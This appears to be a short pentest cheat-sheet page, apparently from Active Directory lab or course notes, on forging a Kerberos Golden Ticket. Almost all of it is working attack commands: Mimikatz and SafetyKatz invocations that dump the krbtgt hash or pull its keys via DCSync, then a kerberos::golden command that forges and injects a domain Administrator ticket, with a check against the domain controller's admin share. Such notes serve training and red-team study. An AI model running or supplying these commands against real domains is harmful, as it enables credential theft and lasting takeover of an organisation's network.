Golden Ticket
Obtain krbtgt hash
# Execute on DC as Domain Admin
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
# DCSync to get AES keys
# Needs Domain admin or Replication Rights
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"Create The Ticket
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<user_sid> /aes256:<aes_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
dir \\dcorp-dc\c$ # check if workedOptions
Last updated